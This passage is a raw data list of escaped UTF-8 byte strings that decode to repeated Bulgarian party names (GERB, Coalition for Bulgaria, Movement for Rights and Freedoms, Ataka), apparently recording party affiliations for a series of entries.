\xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f 